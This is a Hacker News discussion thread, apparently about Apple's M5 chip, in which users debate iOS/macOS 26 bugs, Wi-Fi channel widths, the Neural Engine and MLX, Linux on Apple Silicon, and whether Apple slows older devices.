      As someone who jumped in the apple bandwagon at peak apple and hasn’t been through all their ups and downs the way some die hards have been, it’s been super aggravating dealing with apples shit lately - not what I signed up for all those years ago

      It seems to have been degrading for a long time, but for me it’s been in this past year where it’s crossed into that threshold android used to live in where using the phone causes a physiological response from how aggravating it can be sometimes

      I let my guard down and got too deep into the apple ecosystem- I know better and always avoided getting myself into these situations in the last, but here I am

      The phone sucks right now - super buggy and they continue to remove/impose features that should be left as an option to the user By Yes, this has always been the knock on apple, but I typically havent had an issue with their decisions - it’s just so bad now

      Lesson (re)learned and I will stay away from ecosystems - luckily the damage here is only for media

      The minute I can get blue bubbles reliably on an android, I’ll give the pixel a shot again - if that sucks too then maybe I’ll go back to my teenage years and start rooting devices again

      • SkyPuncher 4 hours ago

        So, I still think the experience is generally better and more integrated than when I was on an Android device. I just find they're generally not really paying attention to user details the way they have in the past.

      • skinnymuch 4 hours ago

        How would you ever get blue bubbles reliably on Android? Are you talking about iMessage or something else?

        I am fully bought into the Apple ecosystem. Not sure yet if I regret it. It is annoying to be so tied down to one company that isn’t going the way I want it to.

        • gxs 2 hours ago

          Yeah iMessage - over the years there have been “breakthroughs” - people find nifty workarounds or have even reverse engineered the iMessage protocol, but for whatever reason nothing ever sticks

          There are current workarounds, like isn’t your home Mac as a relay, but nothing super elegant that I know of

  • port11 3 hours ago

    It's incredible what the hardware teams at Apple have been doing. I imagine they also feel let down by the software that's driving these beasts. It's as if they're 2 completely different companies.

    • kenjackson 3 hours ago

      The latest iPhone OS (iOS 26) is embarrassing. The number of glitches and amount of UI sloppiness is crazy for a company that historically prided itself on the details. It's the first major iOS update I've taken that just seems almost strictly worse than its predecessor.

      • paweladamczuk 2 hours ago

        I remember using my first Apple product years ago, it was an iPod touch 4th gen. The quality of the software on that thing was in a completely different league compared to anything I had used before.

        I also installed the iOS 26 update recently. The competitive advantage of software polish that Apple had seems totally gone.

        Add to that bugs in iCloud, AirDrop... I don't think I will be buying any more Apple devices for myself.

      • georgel 2 hours ago

        This feels more like a repeat of iOS7 to me.

      • kossTKR 2 hours ago

        A small silver lining is if the worlds largest company can ship complete garbage like this don't feel bad about your own small mistakes. I mean i've hotfixed and done my fair share of production reverts - but never, never anything as bad as this.

        Disclaimer, i actually like a bit of "bling", but both Tahoe and IOS so filled with glitches and errors, while the UX is bizarrely inconsistent it really is catastrophically bad.

  • greg5green 4 hours ago

    >The M5 MacBook Pro still gets the Broadcom WiFi chip but the M5 iPad Pros get the N1 and C1X (Sweet).

    Is that good? Their cellular modems have been terrible. I'll reserve judgement until trying one out.

    >The M1 itself is so powerful

    I think this is a bit of a fallacy. Apple Silicon is great for the power consumption to power ratio, but something like a Ryzen 9 7945HX can do 3x more work than an M1 Max. And a non-laptop chip, like an Intel Core Ultra 7 265k can do 3.5x.

  • kwanbix 4 hours ago

    I really wish apple sold the Mx to others like Lenovo.

    I would love to se a ThinkPad with an M5 running Linux.

    • fph 4 hours ago

      What is the Linux experience on new Mac hardware? I'd be interested also in running a Macbuntu.

      • bmdhacks 4 hours ago

        Asahi linux is essentially in a holding pattern with only support up to M2. Likely linux will never be supported above M2 and even M2 has a lot of rough edges. When my monitor sleeps on M2 linux it can never reawaken without a reboot.

  • ksec 8 hours ago

    The Broadcom WiFi support 320Mhz while N1 is stuck with 160Mhz. There were report of N1 not supporting 4096 QAM as well but I didn't check.

    • ExoticPearTree 7 hours ago

      > The Broadcom WiFi support 320Mhz while N1 is stuck with 160Mhz.

      I was at a Wi-Fi vendor presentation a while back and they said that 160 Mhz is pretty improbable unless you're leaving alone and no wireless networks around you. And 320 Mhz even less so.

      In real life probably the best you can get is 80 Mhz in a really good wireless environment.

      • shadowpho 6 hours ago

        For which band? I run 160/160 on 5/6ghz and it’s nice. They are short range enough to work. For 2.4 yeah 20mhz only

        • greg5green 4 hours ago

          For 5ghz, that's a pretty unusual. You need to be somewhere where DFS isn't an issue to even get 160mhz.

          For 6ghz? Yeah, not uncommon.

      • amluto 6 hours ago

        I would believe that MLO or similar features could make it a bit more likely that large amounts of bandwidth would be useful, as it allows using discontiguous frequencies.

        WiFi does currently get anywhere near the bandwidth that these huge channels advertise in realistic environments.

        • astrange 4 hours ago

          OFDMA also makes it more useful, but I don't know if vendors actually use that in practice.

      • mrtesthah 4 hours ago

        Indeed, in any relatively dense setting no one should even think about using channels that wide. Think about the original problem with 2.4ghz 802.11b/g: there were only three non-overlapping channels, so you had interference no matter where you went. Why would we want to return to that hell?

        • 0x457 an hour ago

          My limited experience:

          2.4Ghz is pretty much only used by IoT, you generally don't care about channel width there. When your client device (laptop, phone) downgrades to 2.4Ghz it might as well disconnect because it's unusable.

          5Ghz get stopped by a drywall, so unless your walls are just right to bounce off single, you need AP in every room. Ceiling mounting is pretty much required and you're pretty much free to use channels as wide as your device support and local laws allow.

          6Ghz get stopped by a piece of paper, so the same as 5Ghz except you won't get 6Ghz unless you have haev direct line of sight to the AP.

    • Avamander 3 hours ago

      Channel width is not the only thing that determines the usability or quality of a chipset though.

      Reducing Broadcom's influence over the WiFi ecosystem alone would be a large benefit.

    • HumblyTossed 8 hours ago

      "stuck".

      An infinitely small percentage of people can take advantage of 320Mhz. It's fine.

      • londons_explore 7 hours ago

        Today. But in 3 years time it'll be widespread and your Mac will be the one with the sluggish WiFi connection that jams up the airwaves for all other devices too.

        • landl0rd 4 hours ago

          It really won't, and there will be a ton of devices "jamming up" the airwaves. In most places the backhaul isn't fast enough for anyone to get any use for 320MHz channels beyond maybe very large LAN file transfers which are for some reason happening over WiFi?

          • fragmede 2 hours ago

            Thankfully, there has been nothing new to use computers for since 2022. Definitely no new technology that involves downloading different 10+ Gib large files to test with, and users couldn't possibly conceive of a NAS, nevermind owning one because Netflix has never removed shows while people are watching them, breaking an assumed promise by users. ISP speeds are never ever going to improve either. Everyone knows that!

        • shwaj 5 hours ago

          How does it “jam up the airwaves” if its operating at a different frequency than the devices you say it will be jamming?

    • t-3 7 hours ago

      I doubt the number of people in both "has no neighbors" and "owns Apple hardware" camps are significant at all.

    • MrBuddyCasino 7 hours ago

      I don’t think 4096 QAM is realistic anyway, except if your router is 10 cm away from your laptop.

  • dawnerd 6 hours ago

    I’m still daily driving my M1 Max and have no reason to upgrade for a long time. There’s really nothing in my workflow that could be markedly improved performance wise. There’s only thing is maybe more ram as the need for that keeps growing - I’m isn’t just under 30 when running a bunch of containers.

  • seunosewa 4 hours ago

    My M1 Air got very sluggish after upgrading to Tahoe but then it started behaving normally after a couple of days. Hopefully, you'll experience the same soon.

  • Insanity 7 hours ago

    Yeah I love my M1 iPad Pro. But the "liquid glass" update made it feel slower. Really only the 'unlock' feels slower, once I'm using it it's fine. But it's slightly annoying and does make me want to update this year to the m5.

    But it's a glorified Kindle and YouTube box, so I'm hesitating a little bit.

    • asimovDev 7 hours ago

      my dad's got a pre AS iPad Pro and it's so bad after updating to 26. My 6th gen iPad on iOS 17 felt faster than this

      • baq an hour ago

        I have a 5th gen? Can’t even remember now it’s so old. Nothing works anymore except Netflix, YouTube and Disney, and that only after a minute or so.

        Which is fine, since it’s exclusively used to watch a kids show for a half an hour a day.

        …but it’s also super sad to see a once fantastic piece of kit to degrade so much primarily due to software.

    • knowitnone3 6 hours ago

      "make me want to update this year to the m5." Then Apple software devs did what they were told

  • dimal 2 hours ago

    Seems like the software teams are there to simply squander the extra processing power that the hardware teams provide, thus ensuring recurring revenue. I see no good reason to upgrade to Tahoe. I’d have to buy a new computer just so I could power transparencies that I don’t want.

    • bsimpson 2 hours ago

      This feels like it's always been true.

      Devices get slower for no perceivable reason, when in reality software at all levels makes higher assumptions about how much power you have, and squanders it more readily.

  • DecentShoes an hour ago

    They always release a slowdown update to destroy their older hardware. I don't know why you're even questioning it

  • JumpCrisscross 4 hours ago

    > Tahoe however makes my M1 Air feel sluggish

    Counterpoint: my M1 Pro was a turtle for a few weeks and then stopped doing nonsense in the background and is back to its zippy self. (Still buggy. But that would be true on new hardware, too.)

    • quadyeast 3 hours ago

      mediaanalysisd has been consuming ~140% CPU since upgrading a few weeks ago. I just turned off Apple Intelligence and it dropped to 0%.

  • lelandfe 8 hours ago

    As a UI/UX nerd, it’s a coin flip on intentionality. I’ve been noticing so many rough edges to Apple’s software when it used to astound. iOS Settings search will flash “No Results” as you begin to type which is comically amateurish. The macOS menu bar control panels can’t be keyboard navigated... It’s just silly.

    I’ve been debating making a Tumblr-style blog, something like “dumbapple.com,” to catalogue all the dumb crap I notice.

    • vessenes 7 hours ago

      Liquid Glass feels rushed to me. Tons of UI annoyances especially on iPhone - it's suddenly many clicks to get to prior calls for instance, a core way I call people. I'm imagining it will get ironed out over the next two years.

      • bombcar 3 hours ago

        It really does. It’s a two-year update and hey should have had two teams - one for Liquid Glass working for the next release, and one doing a Snow Leopard-type cleanup for this year. Let the Mac and iPhone be a bit out of sync if needed.

    • jtbayly 6 hours ago

      Please do this. Here are some examples to add to your list, leaving out the 26.0 bugs that I've come to expect running a .0 release.

      1. I won't focus on a bunch of Siri items, but one example that always bugs me: I cannot ask Siri to give me directions to my next meeting. The latest OS introduces an answer for the first time, though. It tells me to open the calendar app on my Apple watch, and tap on the meeting, and tap the address. (I don't have an Apple watch.)

      2. Mail.app on iOS does not have a "share sheet." This makes it impossible to "do" anything with an email message, like send it to a todo app. (The same problem exists with messages in Messages.app)

      3. It is impossible to share a contact card from Messages.app (both iOS and MacOS). You have to leave messages, go to contacts and select the contact to share. Contacts should be one of the apps that shows up in the "+" list like photos, camera, cash, and plenty third party apps.

      4. You still have to set the default system mail app in MacOS as a setting in the Mail.app, instead of in system settings. Last I checked, I'm pretty sure you couldn't do this, without first setting up an account in the Mail.app. Infuriating.

      • grincho 5 hours ago

        I had that complaint about Mail too. Then I realized you can begin dragging an email (from the list view), switch apps with your other hand, and drop it into, say, a todo. Of course, this is less discoverable, so I agree a Share button would not go amiss.

    • jerf 5 hours ago

      "iOS Settings search will flash “No Results” as you begin to type which is comically amateurish."

      I'd love to agree that comically amateurish, but apparently there's something about settings dialogs that make them incredibly difficult to search. It takes Android several seconds to search its settings, and the Microsoft start menu is also comically slow if you try to access control panels through it, although it's just comically slow at search in general. Even Brave here visibly chokes for like 200ms if I search in its preferences dialog... which compared to Android or Windows is instant but still strikes me as a bit to the slow side considering the small space of things being searched. Although it looks like it may be more related to layout than actual searching.

      Still. I dunno why but a lot of settings searches are mind-bogglingly slow.

      (The only thing I can guess at is that the search is done by essentially fully instantiating the widgets for all screens and doing a full layout pass and extracting the text from them and frankly that's still not really accounting for enough time for these things. Maybe the Android search is blocked until the Storage tab is done crawling over the storage to generate the graphs that are not even going to be rendered? That's about what it would take to match the slowdown I see... but then the Storage tab happily renders almost instantly before that crawl is done and updates later... I dunno.)

      • robenkleene 5 hours ago

        The parent isn't commenting about the speed of search, just that saying "No Results", when they really mean "we're still checking for results" is bad UI (which I agree with).

        • array_key_first an hour ago

          The speed is bad too. At least on Android, it does actually take 5-10 seconds sometimes. That's not an exaggeration.

          It should be searching, what, a few hundred strings? What is it doing? Is it making a network call? For what?

          Anyway, barely related, but it does bring into question the quality of modern software.

        • fodkodrasz 3 hours ago

          It is possibly Null value pattern in action, which is a good thing in my opinion (as in robust), though its display this way is a bit suboptimal.

          Funny I'm defending them, but I think this is not even a papercut in my opinion, while they have far bigger issues.

          • fragmede 2 hours ago

            I'm sure this is me seeing the past through rose-colored glasses, but the reason bits of visual pollution like that is particularly annoying is Apple shit used to be so exceptionally polished. Not sure what emotion I want to project on them as to why they're like that now (or if it's even actually true), but it's the perception that if they're no longer getting the little stuff like that polished anymore, what else just isn't being done to the same high standard?

            • NetMageSCW 30 minutes ago

              Lots of things. iOS has never implemented the iPod USB interface properly and whoever thought listing music alphabetically was a good default should be fired.

      • vizzier 4 hours ago

        Might have to be more specific than Android and Windows. Tried them on my devices (S24, windows 11) and they're practically instantaneous.

      • SoKamil 4 hours ago

        The old System Preferences search was lightning fast compared to current SwiftUI System Settings on macOS.

    • butlike 7 hours ago

      iirc, there's a setting to make the menu bar navigatable. you just need to "alt+tab" to it with some weird button combo, like Ctrl + Cmd + 1 or something.

      • lelandfe 7 hours ago

        You can turn on "Full Keyboard Access," which paints a hideous rectangle around anything you focus but does allow keyboard access to everything.

        But, like, man - why can't I just use the arrow keys to select my WiFi network anymore? I was able to for a decade.

        And the answer, of course, is the same for so much of macOS' present rough edges. Apple took some iPadOS interface elements, rammed them into the macOS UI, and still have yet to sand the welds. For how much we complain on HN about Electron, we really need to be pissed about Catalyst/Marzipan.

        Why does the iCloud sign in field have me type on the right side of an input? Why does that field have an iPadOS cursor? Why can't I use Esc to close its help sheet? Why aren't that sheet's buttons focusable?

        Why does the Stocks app have a Done button appear when I focus its search field? Why does its focus ring lag behind the search field's animated size?

        Where in the HIG does it sign off on unfocusable text-only bolded buttons, like Maps uses? https://imgur.com/a/e7PB5jm

        ...Anyway.

  • butlike 7 hours ago

    I think it's probably a play to get you to upgrade for the new GPU computational power. I _do_ think that what we're seeing (and marketed as AI) will be the future, but I don't think it will look like what we're seeing now. Whatever that future holds will require the upgraded capabilities of these new GPU architectures, and this being a reason for the subtle nudge to upgrade from Apple makes sense to me.

    It feels very much like how I imagine someone living in the late 1800's might have felt. The advent of electricity, the advent of cars, but can't predict airplanes, even though they're right around the corner and they'll have likely seen them in their lifetime.

  • pantalaimon 8 hours ago

    Won't that make Linux support even harder :/

  • WhitneyLand 7 hours ago

    “nobody really needs to upgrade that for most things”

    Maybe, but for lots of scenarios even M5 could still benefit from being an order of magnitude faster.

    AI, dev, some content scenarios, etc…

  • antipaul 4 hours ago

    Which is harder these days, software or hardware?

    • DSingularity 4 hours ago

      Each challenging in their own ways. The real challenge is that we need codesign and that’s the tricky part.

  • random3 5 hours ago

    This needs benchmarks.

    Sad if true. I feel my M1 max sluggish too lately. After bragging that this was the longest lived work machine I had and thinking I'm good to wait for M6. This is not good for business, but IMO you need more than raw power to justify upgrades even for professional use - form factor, screen quality, battery, etc.

    I think they bet a lot of hardware money on AI capabilities, but failed to deliver the software, so there was no real reason to upgrade because of AI features in the chip (which is literally what they boast on the first line of the announcement - yet nobody cares about making more cute faces)

    It's not 100% their fault. Everyone got onto the LLM bandwagon like it's "the thing" so even if they didn't believe it they sill needed something. Except an OS is not a chat interface, and LLMs do suck at stricter things.

  • lawlessone 5 hours ago

    >The M1 itself is so powerful that nobody really needs to upgrade that for most things most people do on their computers

    a rant on my part, but a computer from 10 years ago would be fine for what most people do on their computer, only for software bloat..

  • phamduongtria 3 hours ago

    Even the M4 Max MacBook, I tried in the stores were running like shit on Tahoe

  • thenaturalist 6 hours ago

    Don't kidd yourself: Planned obsolescence is real.

    Apple has a higher duty to their shareholders than to their customers.

    Not hating on Apple, just stating the hard economic truth.

    • NetMageSCW 28 minutes ago

      Nope, never been real, never will be real. Just conspiracy theories like all the others.

      PS The Earth isn’t flat. We did go to the Moon. Vaccines don’t cause autism.

  • imcritic 8 hours ago

    [flagged]

    • mumber_typhoon 8 hours ago

      What I have seen with iPhones is that the ram has gone from 4gb to 12gb very quickly compared to how it went from 1gb to 3gb.

      Apps used to use less ram but over the years apps have become big and more complicated. This is probably why iPhones feel sluggish because new iPhones have more memory and apps snap back faster as newer iPhones which also have faster storage and memory bandwidth to reduce latency of reading more data from the flash.

      Batteries are also a problem as maintaining voltage is difficult for a 2-3 year old battery. An official battery swap at apple service for a 3 year old iPhone will make it run much better.

      I used to believe (and sometimes I still do) that apple intentionally makes everything heavier to make old phones and devices feel slower but I don't think thats the case.

      I think that more things are happening on newer phones and devices and that same task feels slower on older device. This happens are lot faster on iPhones and phones in general (a year or two) as opposed to Macs/computers which can show signs of aging in 4-5 years.

      My 2018 intel computer feels very slow in 2025 running Gnome. No one slowed it down. It's just that the 2025 world of software is a lot heavier and 2026 will be even more and so on.

      • bloppe 7 hours ago

        Apple has been proven to intentionally slow down older devices, but it's definitely not to inflate their profits. It's just a way to kindly preserve your old battery for you. And they try to keep it a secret from you so you don't get confused.

        • rsynnott 7 hours ago

          … Eh? It was neither. It was due to a design defect in a particular model; if voltage fell into a range that was perfectly possible with an aging but still functional battery, the SoC would shut off. The only viable software fix was to clock it down instead (there was an option to decline that and risk the abrupt shutoffs).

          Not really sure what else they could have done there.

          • bloppe 7 hours ago

            It's not a particular model. It's every model. And it's just interesting that no other manufacturer seems to have the same problem. iPhones are just too advanced, I suppose.

      • HumblyTossed 8 hours ago

        Apps are heavier because a lot of them do not use native code. It's all cross platform BS. And they include a lot of A/B code as well. Really wish Apple would nip that all in the bud.

    • the_other 7 hours ago

      My iPhone X worked fine for 7 years, even without a battery replacement. It still works just fine. I wanted a larger screen and better zoom lens, so I upgraded earlier this year but I absolutely didn't have to and didn't feel any pressure from Apple to do so.

      n=1.

    • alimbada 8 hours ago

      I've been using an iPhone 11 for 4 years now (also, reminder: the 11 was launched 2 years prior to when I bought mine). I replaced the battery earlier this year as it wouldn't last to the end of the day any more but besides that it's showing no slowdowns or any other issues.

      • bombcar 8 hours ago

        Do you have iOS 26 on it? That pigdog is making my 15 Pro Max sweat and cry.

        • icedchai 7 hours ago

          I have an iPhone 13 and haven't upgraded yet. Sounds like I should hold off.

          • criddell 7 hours ago

            I have an iPhone 13 Mini and upgraded is iOS 26 and it seems fine to me.

            I also have a 2018 iPad Pro and put iPadOS 26 on it and I haven't had any issues on it either except sometimes my keyboard is slow to connect. I'm not sure if it's the software or hardware though.

          • bombcar 7 hours ago

            I haven't really found anything that blew my socks off, and the number of "strange bugs" (not even talking about the UI complaints, just things like "touch stops working suddenly" and other weird things) is too damn high.

            • icedchai 6 hours ago

              I'll probably wait for 26.1 then!

        • alimbada 8 hours ago

          I only just upgraded to iOS 18 recently. I'm unlikely to go to 26 unless there's a good reason to do so.

        • rsynnott 7 hours ago

          Never, ever, upgrade to any Apple OS until at least .1. .0 is _always_ broken.

        • chasd00 7 hours ago

          i don't see what the big deal is with iOS 26. it looks a little bit different, everything now seems to have some degree of transparency but everything works the same.

    • tempoponet 7 hours ago

      They support their phones for years longer than any vendor. This has been widely understood for probably 10+ years at this point.

      There's plenty of room for criticism without a blanket conspiracy that doesn't match what most can observe.

    • endemic 7 hours ago

      No more than any other company.

  • wartywhoa23 3 hours ago

    > ...The <thing I own right now> is so powerful that nobody really needs to upgrade...

    I keep hearing this since the Intel 486DX times, and

    > Nobody will ever need more than 640K of RAM!

    • bombcar 3 hours ago

      This is the first time I’ve gone four+ years without even a real desire to upgrade, I have a hard time figuring out even what would be faster.

      Amusingly enough, adding more ports could do it.

hannesfur 7 hours ago

It’s unfortunate that this announcement is still unspecific about what they improved in the Neural Engine. Since all we know about the Neural Engine comes from Apple papers or reverse engineering efforts (https://github.com/hollance/neural-engine), it’s plausible that they addressed some quirks to enable better transformer performance. They have written quite interesting papers on transformers on the Neural Engine:

- https://machinelearning.apple.com/research/neural-engine-tra...

- https://machinelearning.apple.com/research/vision-transforme...

Things have definitely gotten better with MLX on the software side, though it still seems they could do more in that area (let’s see what the M5 Max brings). But even if they made big strides here, it won’t help previous generations, and the main thing limiting Apple Intelligence (in my opinion) will continue to be the 8 GB of unified memory they still insist on.

  • trymas 7 hours ago

    > the main thing limiting Apple Intelligence (in my opinion) will continue to be the 8 GB of unified memory they still insist on.

    As you said - it won’t help previous generations, though since last year (or two??) all macs start with 16GB of memory. Even entry level macbook airs.

    • hannesfur 7 hours ago

      Thats true! I was referring to their wider line up, especially the iPad, where users will expect the same performance as on the Mac’s (they payed for an Mx chip) and they sold me an iPad Air this year that comes with a really fast M3 and still only 8 GB of RAM (you only get 16 on the iPad Pro btw if you go with at least 1TB of storage on the M4 Pro one)

      • doug_durham 4 hours ago

        "They sold me"? You me you bought.

      • moi2388 7 hours ago

        Why would you expect the same performance on iPad and MacBook Pro?

        The latter has up to 128GB of memory?

        • hannesfur 6 hours ago

          You probably wouldn’t with a Pro but you might between an iPad Pro and an MacBook Air. With the foundation models API they basically said that there will be one size of model for the entire platform, making smarter models on a MacBook Pro unrealistic and only faster ones possible.

          • LoganDark 6 hours ago

            Isn't Private Cloud Compute already enabling the more powerful models to be run on the server? That way the on-device models don't have as much pressure to be The One.

    • raverbashing 6 hours ago

      I bet Cook authorized the upgrade with grinned teeth and I was all for it

  • liuliu 7 hours ago

    Faster compute helps, for things like vision language model that requires bigger context to be filled. My understanding is that ANE is still optimized for convolution load, and compute efficiency while the new neural accelerators optimized for flexibility and performance.

    • zozbot234 7 hours ago

      The old ANE enabled arbitrary statically scheduled multiply-add, of INT8 or FP16. That's good for convolution but not specifically geared for it.

      • liuliu 5 hours ago

        I am not an expert on ANE, but I think it is related to the size of register files and how that is smaller than what we need for GEMM on modern transformers (especially these fat ones with MoE).

        • zozbot234 5 hours ago

          AIUI the ANE makes use of data in unified memory, not in the register file. So this wouldn't be an inherent limitation. (OTOH, that's why it wastes memory bandwidth for most newer transformer models, which use heavily quantized data - the ANE will have to read padded/unquantized values and the fraction of memory bandwidth that's used for that padding is pure waste.)

    • hannesfur 7 hours ago

      That would be an interesting approach if true. I hope someone gets to the bottom of it once we have hardware in our hands.

  • fooblaster 7 hours ago

    MLX doesn't use the neural engine still right? I still wish they would abandon that unit and just center everything around metal and tensor units on the GPU.

    • hannesfur 7 hours ago

      Oh, I overlooked that! You are right. Surprising… since Apple has shown that it’s possible through CoreML (https://github.com/apple/ml-ane-transformers)

      I would hope that the Foundation Models (https://developer.apple.com/documentation/foundationmodels) use the neural engine.

      • fooblaster 6 hours ago

        The neural engine not having a native programming model makes it effectively a dead end for external model development. It seems like a legacy unit that was designed for cnns with limited receptive fields, and just isn't programmable enough to be useful for the total set of models and their operators available today.

        • hannesfur 5 hours ago

          That's sadly true, over in x86 land things don't look much better in my opinion. The corresponding accelerators on modern Intel and AMD CPUs (the "Copilot PCs") are very difficult to program as well. I would love to read a blog post on someone trying though!

    • zozbot234 7 hours ago

      Wrt. language models/transformers, the neural engine/NPU is still potentially useful for the pre-processing step, which is generally compute-limited. For token generation you need memory bandwidth so GPU compute with neural/tensor accelerators is preferable.

      • fooblaster 7 hours ago

        I think I'd still rather have the hardware area put into tensor cores for the GPU instead of this unit that's only programmable with onnx.

    • llm_nerd 6 hours ago

      MLX is a training/research framework, and the work product is usually a CoreML model. A CoreML model will use any and all resources that are available to it, at least if the resource fits for the need.

      The ANE is for very low power, very specific inference tasks. There is no universe where Apple abandons it, and it's super weird how much anti-ANE rhetoric there is on this site, as if there can only be one tool for an infinite selection of needs. The ANE is how your iPhone extracts every bit of text from images and subject matter information from photos with little fanfare or heat, or without destroying your battery, among many other uses. It is extremely useful for what it does.

      >tensor units on the GPU

      The M5 / A19 Pro are the first chips with so-called tensor units. e.g. matmul on the GPU. The ANE used to be the only tensor-like thing on the system, albeit as mentioned designed to be super efficient and for very specific purposes. That doesn't mean Apple is going to abandon the ANE, and instead they made it faster and more capable again.

      • zozbot234 5 hours ago

        > ...and it's super weird how much anti-ANE rhetoric there is on this site, as if there can only be one tool for an infinite selection of needs

        That seems like a strange comment. I've remarked in this thread (and other threads on this site) about what's known re: low-level ANE capabilities, and it seems to have significant potential overall, even for some part of LLM processing. I'm not expecting it to be best-in-class at everything, though. Just like most other NPUs that are also showing up on recent laptop hardware.

      • almostgotcaught 6 hours ago

        > the work product is usually a CoreML model.

        What work product? Who is running models on Apple hardware in prod?

        • llm_nerd 6 hours ago

          An enormous number of people and products. I'm actually not sure if your comment is serious, because it seems to be of the "I don't, therefore no one does" variety.

          • bigyabai 5 hours ago

            Enormous compared to what? Do you have any numbers, or are you going off what your X/Bluesky feed is telling you?

            • llm_nerd 5 hours ago

              I'm super not interested in arguing with the peanut gallery (meaning people who don't know the platform but feel that they have absolute knowledge of it), but enough people have apps with CoreML models in them, running across a billion or so devices. Some of those models were developed or migrated with MLX.

              You don't have to believe this. I could not care less if you don't.

              Have a great day.

              • kanaffa12345 5 hours ago

                > I'm super not interested in arguing with the peanut gallery

                i love blustery nerds lol. what if i told you i'm a coreml contrib and i know for a fact you're wrong?

                • llm_nerd 5 hours ago

                  Logging into the alt for this? Good god.

                  It would help if you would explain what I said that is wrong. You know, as the "haven't logged in in three years but pulled out the alt for this" CoreML contributor you are. This is an especially weird bit of trolling giving that nothing I said is remotely even contentious, and is utterly banal facts.

                  • koolala 4 hours ago

                    Can you share a example of apps you mean any maybe it would clear up any confusion?

              • bigyabai 5 hours ago

                I don't believe it. MLX is a proprietary model format and usually the last to get supported on Huggingface. Given that most iOS users aren't selecting their own models, I genuinely don't think your conjecture adds up. The majority of people are likely using safetensors and GGUF, not MLX.

                If you had a source to cite then it would remove all doubt pretty quickly here. But your assumptions don't seem to align with how iOS users actually use their phone.

                • llm_nerd 5 hours ago

                  Cite a source? That CoreML models are prolific on Apple platforms? That Apple devices are prolific? Search for it yourself.

                  You seem set on MLX and apparently on your narrow view of what models are. This discussion was about ANE vs "tensor" units on the GPU, and someone happened to mention MLX in that context. I clarified the role of MLX, but that from an inference perspective most deployments are CoreML, which will automatically use ANE if the model or some subset fits (which is actually fairly rare as it's a very limited -- albeit speedy and power efficient -- bit of hardware). These are basic facts.

                  >how iOS users actually use their phone.

                  What does this even mean? Do you think I mean people are running Qwen3-Embedding-4B in pytorch on their device or something? Loads of apps, including mobile games, have models in them now. This is not rare, and most users are blissfully unaware.

                  • kanaffa12345 5 hours ago

                    > That CoreML models are prolific on Apple platforms? That Apple devices are prolific?

                    correct and non-controversial

                    > An enormous number of people and products [use CoreML on Apple platforms]

                    non-sequitur

                    EDIT: i see people are not aware of

                    https://en.wikipedia.org/wiki/Simpson%27s_paradox

  • xiphias2 an hour ago

    My guess is that they moved the systolic arrays inside the GPU cores just like how it's done in modern NVIDIA chips.

    That's the only way to speed up MLX 4x compared to M4.

  • zuspotirko 6 hours ago

    ofc true. Unified memory is always less than vram. And my 16GB vram aren't enough.

    But I think it's also a huge issue Apple makes storage so expensive. If Apple wants local AI to answer your questions it should be able to take your calender, emails, text messages, photos, journal entries etc. into account. It can't do that as nicely as long as customers opt for only 256GB or 1TB devices due to cost

  • JKCalhoun 7 hours ago

    I can only guess that significant changes in hardware have longer lead times than software (for example). I suppose I am not expecting anything game-changing until the M6.

gcr 7 hours ago

So how many hardware systems does Apple silicon have for doing matrix multiplies now?

1. CPU, via SIMD/NEON instructions (just dot products)

2. CPU, via AMX coprocessor (entire matrix multiplies, M1-M3)

3. CPU, via SME (M4)

4. GPU, via Metal (compute shaders + simdgroup-matrix + mps matrix kernels)

4. Neural Engine via CoreML (advisory)

Apple also appears to be adding a “Neural Accelerator” to each core on the M5?

  • throwaway31131 2 hours ago

    Doesn’t that make sense though as each manipulates a different layer in the memory hierarchy allowing the programmer to control the latency and throughput implications. I see it as a good thing.

  • jmrm 4 hours ago

    I wonder if some Apple-made software, like Final Cut, make use of all of those "duplicated" instructions at the same time for getting a better performance...

    I know how just the multitasking nature of the OS probably make this situation happens across different programs, but nonetheless would be pretty cool!

  • nullbyte 4 hours ago

    Thankfully I think libraries like Pytorch abstract this stuff away. But it seems very convoluted if you're building something from the ground up.

    • gardnr 3 hours ago

      Does PyTorch support other acceleration? I thought they just support Metal.

  • twoodfin 4 hours ago

    Is this really strange? Matmul is just a specialized kind of primitive compute, one that is seeing an explosion in practical uses.

    A Mac Quadra in 1994 probably had floating point compute all over the place, despite the 1984 Mac having none.

  • oskarkk 6 hours ago

    Would it be possible to use all of them at the same time? Not necessarily in a practical way, but just for fun? Could different ways of doing this on CPU be done in some extent by one core at the same time, given it's superscalar?

  • HeckFeck 3 hours ago

    Adding CPUs and GPUs on top of your CPUs and GPUs... Sounds like we've the spiritual successor of the Sega Saturn.

  • llm_nerd an hour ago

    >Apple also appears to be adding a “Neural Accelerator” to each core on the M5?

    The "neural accelerator" is per GPU core, and is matmul. e.g. "Tensor cores".

  • hannesfur 7 hours ago

    I inferred that they meant the neural engine cores by neural accelerators or it could be a bigger/different AMX (which really should become a standard btw)

warrenmiller a minute ago

why only on the 14'' not the 16'' ?

drnick1 3 hours ago

A lot of Apple hardware is impressive on paper, but I will never buy a Mac that can't run Linux. I simply don't want to live in Apple's walled garden.

Then there is the whole ARM vs x86 issue. Even if a compatible Linux distro were made, I expect to run all kinds of software on my desktop rig including games, and ARM is still a dead end for that. For laptops, it's probably a sensible choice now, but we're still far from truly free and usable ARM desktop.

  • littlecranky67 an hour ago

    > A lot of Apple hardware is impressive on paper, but I will never buy a Mac that can't run Linux.

    They run Linux actually very well, have you ever tried Parallels or VMware Fusion? Especially Parallels ships with good softwaer drivers for 2d/3d/video acceleration, suspend, and integration into the host OS. If that is not your thing, the new native container solution in Tahoe can run container from dockerhub and co.

    > I simply don't want to live in Apple's walled garden.

    And what walled garden would that be on macOS? You can install what you want, and there is homebrew at your fingertips with all the open and non-open software you can ask for.

    • mixmastamyk an hour ago

      Last I looked... extensive telemetry and a sealed boot volume that makes it impractical to turn off even if theoretically possible. There are other problems of course.

    • imoverclocked an hour ago

      ... or UTM. I have run windows and Linux on my M1 MB Pro with plenty of success.

      Windows - because I needed it for a single application.

      Linux - has been extremely useful as a compliment to small arm SBCs that I run. eg: Compiling a kernel is much faster there than on (say) a Raspberry Pi. Also, USB device sharing makes working with vfat/ext4 filesystems on small memory cards a breeze.

  • geek_at 2 hours ago

    I'm still looking for a decent ARM laptop that runs linux well. I have my eye on one from lenovo but linux support is still not the best

  • drcode an hour ago

    M1 and M2 Macs run Asahi Linux very well (but no option for M3,M4,M5 yet)

  • gffrd an hour ago

    OK, so then don't.

alberth 7 hours ago

Apple is binning the iPad Pro chips:

   Storage      CPU
   ≤ 512GB      3 P-cores (and 6 E-cores)
   1TB+         4 P-cores (and 6 E-cores)
https://www.apple.com/ipad-pro/specs/
